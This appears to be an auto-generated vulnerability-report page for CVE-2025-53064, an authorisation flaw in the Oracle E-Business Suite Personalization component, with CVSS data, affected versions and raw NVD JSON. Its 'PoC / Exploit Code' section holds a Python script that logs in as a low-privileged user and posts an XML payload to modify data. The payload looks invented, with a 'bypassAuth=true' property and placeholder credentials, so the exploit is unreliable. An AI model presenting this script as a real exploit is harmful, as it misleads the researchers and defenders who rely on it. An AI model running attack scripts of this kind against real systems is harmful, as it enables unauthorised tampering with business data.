Security Vulnerability Report
中文
CVE-2025-53064 CVSS 4.3 MEDIUM

CVE-2025-53064

Published: 2025-10-21 20:20:47
Last Modified: 2025-10-28 16:17:26
Source: [email protected]

Description

Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Personalization). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:applications_framework:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite 12.2.3
Oracle E-Business Suite 12.2.4
Oracle E-Business Suite 12.2.5
Oracle E-Business Suite 12.2.6
Oracle E-Business Suite 12.2.7
Oracle E-Business Suite 12.2.8
Oracle E-Business Suite 12.2.9
Oracle E-Business Suite 12.2.10
Oracle E-Business Suite 12.2.11
Oracle E-Business Suite 12.2.12
Oracle E-Business Suite 12.2.13
Oracle E-Business Suite 12.2.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53064 - Oracle Applications Framework Personalization Component # Exploit PoC (Proof of Concept) # Vulnerability: Unauthorized update/insert/delete via Personalization component # Affected: Oracle E-Business Suite 12.2.3 - 12.2.14 import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET_URL = "https://target-ebs-host:port" OAUTH_URL = f"{TARGET_URL}/OA_HTML/OA.jsp" PERSONALIZATION_ENDPOINT = f"{TARGET_URL}/OA_HTML/RF.jsp" def exploit_personalization(base_url, session_cookie, target_object_id, action): """ Exploit the Personalization component authorization bypass. Parameters: - base_url: Oracle EBS base URL - session_cookie: Authenticated session cookie (low-privileged user) - target_object_id: The data object identifier to manipulate - action: 'update', 'insert', or 'delete' """ headers = { "Cookie": session_cookie, "Content-Type": "application/xml", "User-Agent": "Mozilla/5.0 (compatible; OracleEBS-Exploit)" } # Craft malicious personalization payload targeting the vulnerable component payload = f"""<?xml version="1.0" encoding="UTF-8"?> <personalization> <objectId>{target_object_id}</objectId> <action>{action}</action> <region> <regionId>REGION_PERSONALIZATION</regionId> <customization level="user"> <property name="bypassAuth" value="true"/> <data> <field name="content">{action}_payload_data</field> </data> </customization> </region> </personalization>""" response = requests.post( PERSONALIZATION_ENDPOINT, data=payload, headers=headers, verify=False ) return response def main(): # Step 1: Authenticate with low-privileged credentials session = requests.Session() auth_payload = { "username": "low_priv_user", "password": "password123", "submit": "Login" } # Step 2: Obtain session cookie after authentication resp = session.post(OAUTH_URL, data=auth_payload, verify=False) session_cookie = resp.cookies.get("JSESSIONID") # Step 3: Exploit the Personalization vulnerability target_object = "XXCUST_OBJECT_001" result = exploit_personalization( TARGET_URL, f"JSESSIONID={session_cookie}", target_object, "update" ) print(f"Status: {result.status_code}") print(f"Response: {result.text[:500]}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53064", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:46.773", "lastModified": "2025-10-28T16:17:26.297", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Personalization). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:applications_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "E221C0C5-FC44-4D76-A6E6-F451A6466A17"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.